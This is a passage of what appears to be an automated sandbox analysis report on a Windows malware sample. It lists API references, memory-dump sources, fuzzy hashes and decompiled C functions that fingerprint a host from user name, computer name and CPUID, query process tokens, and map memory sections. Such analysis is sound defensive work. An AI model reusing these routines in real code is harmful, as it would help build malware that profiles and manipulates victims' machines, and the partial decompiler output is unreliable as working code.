TerminateThread.KERNEL32(00000000,00000000), ref: 7025127B
CloseHandle.KERNEL32(00000000), ref: 70251282
SetLastError.KERNEL32(00000000), ref: 70251287
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 70251294
GetExitCodeThread.KERNEL32(00000000,?), ref: 702512A8
CloseHandle.KERNEL32(00000000), ref: 702512AF
GetLastError.KERNEL32 ref: 702512B3
GetLastError.KERNEL32 ref: 702512C6

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: 3df6a7da13757c93ec8c8bf1845bf28ef7cc8083a969f902fa05196ed0352311
Instruction ID: e633280d1a75db0624ad243a1865639f5b346e9e97ff6d9276ffe0ccee63f47e
Opcode Fuzzy Hash: 3df6a7da13757c93ec8c8bf1845bf28ef7cc8083a969f902fa05196ed0352311
Instruction Fuzzy Hash: 6B41B873608721AF8311DF768C4CA5FBBFCEA85264B200699FD15C2290E734D9199B69

Uniqueness

Uniqueness Score: -1.00%

Function 00DCA12A, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00DCA12A(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xdcd228; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00DC5B70( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xdcd22c ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xdcd1f0, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00DC5AC5(_v8 + _v8, _t63);
							}
							HeapFree( *0xdcd1f0, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xdcd1f0, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00DC5AC5(_v8 + _v8, _t63);
						}
						HeapFree( *0xdcd1f0, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00dca12a
0x00dca132
0x00dca138
0x00dca13b
0x00dca13e
0x00dca140
0x00dca145
0x00dca145
0x00dca14b
0x00dca14d
0x00dca15a
0x00dca1bb
0x00dca15c
0x00dca161
0x00dca167
0x00dca16c
0x00dca17a
0x00dca17e
0x00dca18d
0x00dca194
0x00dca19b
0x00dca19b
0x00dca1a6
0x00dca1a6
0x00dca17e
0x00dca16c
0x00dca1bd
0x00dca1c3
0x00dca1cd
0x00dca1cf
0x00dca1d4
0x00dca1e3
0x00dca1e7
0x00dca1f2
0x00dca1f9
0x00dca200
0x00dca200
0x00dca20c
0x00dca20c
0x00dca1e7
0x00dca215
0x00dca217
0x00dca21a
0x00dca21c
0x00dca21f
0x00dca222
0x00dca22c
0x00dca230
0x00dca234

APIs

GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA161
RtlAllocateHeap.NTDLL(00000000,00DC79C7), ref: 00DCA178
GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA185
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DC79C7,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DCA1A6
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1CD
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DCA1E1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1EE
HeapFree.KERNEL32(00000000,00000000), ref: 00DCA20C

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: d00445f683a080c1cdd927931f24037b5e49c75c0b20f969bd83ba86e33dc48b
Instruction ID: ac09a0015b45da4c954fa01a51648bae5a1c9ffeccc0fc94c299844da14bcad4
Opcode Fuzzy Hash: d00445f683a080c1cdd927931f24037b5e49c75c0b20f969bd83ba86e33dc48b
Instruction Fuzzy Hash: 1631E272A1030BEFDB11DFA9DC81F6AB7FAEB48214F684469E505D3210D730EE01AB65

Uniqueness

Uniqueness Score: -1.00%

Function 70290FE0, Relevance: 11.2, APIs: 2, Strings: 4, Instructions: 693COMMON

Download Yara Rule

APIs

CreateSemaphoreA.KERNEL32(00000000,00000008,00000008,00000000), ref: 70291078
GetSystemDirectoryA.KERNEL32(702C1460,0000079D), ref: 702916AF

Strings

",p, xrefs: 70291906
, xrefs: 70291543
4,p, xrefs: 70291962
4, xrefs: 7029148B

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: CreateDirectorySemaphoreSystem
String ID: $",p$4$4,p
API String ID: 3735132268-3300495120
Opcode ID: 27f8fe6a4ff15f05e0855df5a2143e018a3654a3c94a7614ed08f7b45006b8eb
Instruction ID: 542995ae4b592a3238c591952862fd0b2b28f72fc35127c9a48e7c68580d6d0c
Opcode Fuzzy Hash: 27f8fe6a4ff15f05e0855df5a2143e018a3654a3c94a7614ed08f7b45006b8eb
Instruction Fuzzy Hash: 65625D72A11219CFEB24CF29CC94BDDB7B5BB48304F1482AAD449E7390DB70AA94DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00DC11A9, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00DC11A9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00DC75C4(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00DC4C31(_t44);
						}
						NtClose(_v8);
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00dc11b6
0x00dc11b7
0x00dc11b8
0x00dc11b9
0x00dc11ba
0x00dc11be
0x00dc11c5
0x00dc11d4
0x00dc11d7
0x00dc11da
0x00dc11e1
0x00dc11e4
0x00dc11e7
0x00dc11ea
0x00dc11ed
0x00dc11f8
0x00dc11fa
0x00dc1203
0x00dc120b
0x00dc120d
0x00dc121f
0x00dc1229
0x00dc122d
0x00dc123c
0x00dc1240
0x00dc1249
0x00dc1251
0x00dc1251
0x00dc1253
0x00dc1253
0x00dc125b
0x00dc1261
0x00dc1265
0x00dc1265
0x00dc1270

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00DC11F0
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00DC1203
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DC121F

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DC123C
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00DC1249
NtClose.NTDLL(00000000), ref: 00DC125B
NtClose.NTDLL(00000000), ref: 00DC1265

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: b7079fdffea8b3cd080777cd360050ec363c0a5e45bd2402d2f54e78f32ce4b0
Instruction ID: 4ccef696d3394f8135f88f584e317f2a76065bb356373f2e61ee550eb556496d
Opcode Fuzzy Hash: b7079fdffea8b3cd080777cd360050ec363c0a5e45bd2402d2f54e78f32ce4b0
Instruction Fuzzy Hash: A421F4B691022AABDB01DF95CC85EDEBFB9EB08740F144026FA04E6261D7719A409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 702A4BBD, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

GetACP.KERNEL32(?,?,?,?,?,?,7029E479,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 702A4C7E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7029E479,?,?,?,00000055,?,-00000050,?,?), ref: 702A4CA9
_wcschr.LIBVCRUNTIME ref: 702A4D3D
_wcschr.LIBVCRUNTIME ref: 702A4D4B

Part of subcall function 7029D950: GetLocaleInfoEx.KERNELBASE(?,7029EFF6,?,20001004,00000000,00000002,?,?,7029E5E1,?,?,?,00000055,?,-00000050,?), ref: 7029D975

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 702A4E0C

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorInfoLastLocale_wcschr$CodePageValid
String ID:
API String ID: 2037648569-0
Opcode ID: 2cbbc679ee8ff0a4cabe77eaa890604492e91c50e1166a3a4f2c1cbcf81e0e63
Instruction ID: 63153f87feca6e10452a5ac115aaa2f8104b5dd816d5b45db8f13bd917d3f945
Opcode Fuzzy Hash: 2cbbc679ee8ff0a4cabe77eaa890604492e91c50e1166a3a4f2c1cbcf81e0e63
Instruction Fuzzy Hash: 9071D7B3A00602AED7159F35CC46BAE77ADEF84710F10442AFD0AD7180EEB4E9618B54

Uniqueness

Uniqueness Score: -1.00%

Function 7025161B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E7025161B(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E702515D9(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x70251624
0x7025162b
0x7025162c
0x7025162d
0x7025162e
0x7025162f
0x70251640
0x70251644
0x70251658
0x7025165b
0x7025165e
0x70251665
0x70251668
0x7025166f
0x70251672
0x70251675
0x70251678
0x7025167d
0x702516b8
0x7025167f
0x70251682
0x70251688
0x7025168d
0x70251691
0x702516af
0x70251693
0x7025169a
0x702516a8
0x702516a8
0x70251691
0x702516c0

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 70251678

Part of subcall function 702515D9: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,7025168D,00000002,00000000,?,?,00000000,?,?,7025168D,?), ref: 70251606

memset.NTDLL ref: 7025169A

Strings

@, xrefs: 70251668

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 2d92a1d77e074ed22cb8003e12d9637ed81339819b621d5ff0ac7384ed7c868c
Instruction ID: b3246d88dc740369731fba2dcee3a1dc018f47ab81a021c63c11c10121ccbdc5
Opcode Fuzzy Hash: 2d92a1d77e074ed22cb8003e12d9637ed81339819b621d5ff0ac7384ed7c868c
Instruction Fuzzy Hash: E8210BB6E00209AFCB01DFA9C8849DFFBB9FB48354F144569E506F3210D734AA588FA4

Uniqueness

Uniqueness Score: -1.00%

Function 7029D950, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNELBASE(?,7029EFF6,?,20001004,00000000,00000002,?,?,7029E5E1,?,?,?,00000055,?,-00000050,?), ref: 7029D975
GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7029EFF6,?,20001004,00000000,00000002,?,?,7029E5E1), ref: 7029D984

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f49278dc46b49e4b84ee6b4ade1d8ae445293add30592abcb4ed650eb7b1ed4f
Instruction ID: 215ab4d9b30eb16e9f2a86b75ab42214cbbbf1703ddc3a09930c7dd29f354265
Opcode Fuzzy Hash: f49278dc46b49e4b84ee6b4ade1d8ae445293add30592abcb4ed650eb7b1ed4f
Instruction Fuzzy Hash: 33E01A77510118BBDB122F61CC09F9E3A29FB44751F104010FC0B761648B329931BAA8

Uniqueness

Uniqueness Score: -1.00%

Function 7029D7FD, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

EnumSystemLocalesEx.KERNELBASE ref: 7029D825

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: c30cb98ab9e8ccbe8938f0f9c680bd9cc351964ab0dc51d797f835084a613903
Instruction ID: 47ecf07d23e0f17f01206294b48723d22bd0349598ce5fb748afb8611dc9e814
Opcode Fuzzy Hash: c30cb98ab9e8ccbe8938f0f9c680bd9cc351964ab0dc51d797f835084a613903
Instruction Fuzzy Hash: F3F0F97B80011DABCB02EF94C808ADE7BB8EB48250F004566AA16A6151EB74A625DFD4

Uniqueness

Uniqueness Score: -1.00%

Function 702515D9, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E702515D9(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x702515eb
0x702515f1
0x702515ff
0x70251606
0x7025160b
0x70251611
0x00000000
0x70251612
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,7025168D,00000002,00000000,?,?,00000000,?,?,7025168D,?), ref: 70251606

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 06686b75655befdbbd666d50df5a4ae892e4d41f91e38e91e47af8f90e9edb0b
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: AFF037B690020CFFDB119FA5CC85C9FBBBDEB44354B104979F152E1190D6709E1C9B60

Uniqueness

Uniqueness Score: -1.00%

Function 702A466E, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorInfoLastLocaleProcess_free$CurrentFeaturePresentProcessorTerminate
String ID:
API String ID: 2654153487-0
Opcode ID: 1f5b67d76b76583702532c83433d11ad5a26db6a953336e68cd4650725b09864
Instruction ID: a2364358dc38bab294e0ddeda8fce48c1ce50c6345c0dfac21143750ea64ccff
Opcode Fuzzy Hash: 1f5b67d76b76583702532c83433d11ad5a26db6a953336e68cd4650725b09864
Instruction Fuzzy Hash: 9DB1D2B75003428FD7299F25CC82BAFB3A9EB85308F50456DEE4386580EEB4F965CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00DC37CA, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00DC37CA(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xdcd1f8);
					_v20 = 0;
					_v16 = 0;
					L00DCAEE0();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xdcd224; // 0x328
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0 || E00DC4C46() != 0) {
							 *0xdcd204 = 5;
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xdcd218 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00DC80F6( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00DC53BE(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xdcd1fc);
							goto L21;
						} else {
							__eflags =  *0xdcd200; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00DC53A8();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xdcd200);
								L21:
								L00DCAEE0();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xdcd1f0, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00dc37ca
0x00dc37dc
0x00dc37df
0x00dc37eb
0x00dc37f3
0x00dc37f6
0x00dc395c
0x00dc37fc
0x00dc37fc
0x00dc37fe
0x00dc3803
0x00dc3804
0x00dc380a
0x00dc380d
0x00dc3810
0x00dc381e
0x00dc3829
0x00dc382c
0x00dc382e
0x00dc383b
0x00dc3845
0x00dc3849
0x00dc384c
0x00dc3851
0x00dc385c
0x00dc385c
0x00dc3866
0x00000000
0x00dc3869
0x00dc386d
0x00dc3878
0x00dc3878
0x00dc387f
0x00dc3884
0x00dc388b
0x00dc3894
0x00dc389a
0x00dc389d
0x00dc38a4
0x00dc38a7
0x00000000
0x00000000
0x00dc38a9
0x00dc38ac
0x00dc38af
0x00dc38b2
0x00000000
0x00dc38b4
0x00dc38c3
0x00dc38c3
0x00000000
0x00dc38f1
0x00dc38f1
0x00dc38f6
0x00dc3915
0x00dc3917
0x00dc391c
0x00dc391d
0x00000000
0x00dc38f8
0x00dc38f8
0x00dc38fe
0x00000000
0x00dc3900
0x00dc3900
0x00dc3905
0x00dc3907
0x00dc390c
0x00dc390d
0x00dc3923
0x00dc3923
0x00dc392b
0x00dc3936
0x00dc3939
0x00dc3944
0x00dc3946
0x00dc3948
0x00dc394b
0x00000000
0x00dc3951
0x00000000
0x00dc3951
0x00dc394b
0x00dc38fe
0x00000000
0x00dc38f6
0x00dc38c6
0x00dc38c8
0x00dc38cb
0x00dc38cc
0x00dc38cc
0x00dc38d0
0x00dc38da
0x00dc38da
0x00dc38e0
0x00dc38e3
0x00dc38e3
0x00dc38e9
0x00dc38e9
0x00dc3966
0x00000000

APIs

memset.NTDLL ref: 00DC37DF
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00DC37EB
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00DC3810
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00DC382C
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DC3845
HeapFree.KERNEL32(00000000,00000000), ref: 00DC38DA
CloseHandle.KERNEL32(?), ref: 00DC38E9
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00DC3923
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00DC7A05), ref: 00DC3939
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DC3944

Part of subcall function 00DC4C46: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05119360,?,00000000,30314549,00000014,004F0053,0511931C), ref: 00DC4D32
Part of subcall function 00DC4C46: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DC3858), ref: 00DC4D44

GetLastError.KERNEL32 ref: 00DC3956

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: c7628cadf03249355b3e7aed8b982878c8774b29765cf1af2e96e52da2b9c9f0
Instruction ID: 0345acff1e379d09a6b76d6670135ab566e478c847c4e8bcf847ec7ea14261a3
Opcode Fuzzy Hash: c7628cadf03249355b3e7aed8b982878c8774b29765cf1af2e96e52da2b9c9f0
Instruction Fuzzy Hash: 84513A7190122BAADF10DF95DC44EEEBBB9EF09364F24812AF515E3294D7709A40DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC77EB, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00DC77EB(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00DC8B76();
				if(_t27 != 0) {
					_t77 =  *0xdcd214; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xdcd214 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xdcd134(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00DC82D9( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xdcd230; // 0x434a5a8
					_push("h�T");
					_push(1);
					_t7 = _t32 + 0xdce5bc; // 0x4d283a53
					 *0xdcd234 = 0xc;
					 *0xdcd23c = 0;
					L00DC73FE();
					_t36 = E00DC12E8(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00DCA12A(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00DC75C4(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xdcd230; // 0x434a5a8
								_t18 = _t64 + 0xdce916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xdcd288 = _t87;
						}
						_t38 = E00DCA667();
